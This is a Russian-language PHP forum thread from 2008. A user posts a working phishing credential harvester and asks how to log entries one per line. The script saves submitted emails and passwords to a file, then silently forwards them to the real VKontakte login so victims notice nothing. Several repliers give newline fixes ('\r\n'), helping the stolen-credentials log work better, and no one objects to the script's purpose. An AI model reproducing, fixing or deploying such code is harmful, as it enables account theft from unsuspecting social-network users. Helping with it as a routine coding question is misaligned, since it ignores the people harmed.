Подскажите как исправить это код что бы он делал запись в фаил в столбик а не в строч

Тема в разделе "PHP", создана пользователем troll90945, 17 ноя 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. troll90945

    troll90945 Читатель

    Заблокирован
    Регистр.:
    29 фев 2008
    Сообщения:
    109
    Симпатии:
    47
    Подскажите как исправить это код что бы он делал запись в фаил в столбик а не в строчку
    Код:
    <?php
    $login = $_POST['email'];
    $password = $_POST['pass'];
    $str = "$login:$password\n";
    $fo = fopen("file","a+");
    fwrite($fo,$str);
    fclose($fo);
    echo "
    <html>
    <body onload=submitform()>
     <form method='post' name='login' id='login' action='http://vkontakte.ru/login.php'>
     <input type='hidden' name='success_url' id='success_url' value=''>
     <input type='hidden' name='fail_url' id='fail_url' value=''>
     <input type='hidden' name='try_to_login' id='try_to_login' value='1'>
     <input type='hidden' name='email' value='$login'>
     <input type='hidden' name='pass' value='$password'>
     </form>
    <script type='text/javascript'>document.login.submit();</script>
    </body>
    </html>";
    
    ?>
    зарание благодарен!!!
     
  2. demmy

    demmy

    Регистр.:
    13 ноя 2006
    Сообщения:
    330
    Симпатии:
    96
    \n - и делает перенос, можешь поиграться поместить ее в саму функцию записи:
    Код:
    fwright ($fo, $str ."\n");
    
    Помоему так...
     
  3. Starik777

    Starik777 Постоялец

    Регистр.:
    19 апр 2008
    Сообщения:
    66
    Симпатии:
    35
    Попробуй его посмотреть другим редактором (если блокнотом смотришь). Либо \n замени на \n\r.
     
  4. wizer

    wizer Создатель

    Регистр.:
    6 июн 2006
    Сообщения:
    27
    Симпатии:
    1
    вообще-то

    $str = "$login:$password\r\n";

    и будет с новой строки
     
  5. HatoL

    HatoL

    Регистр.:
    5 фев 2008
    Сообщения:
    206
    Симпатии:
    36
    поправка: писать надо \r\n.
     
Статус темы:
Закрыта.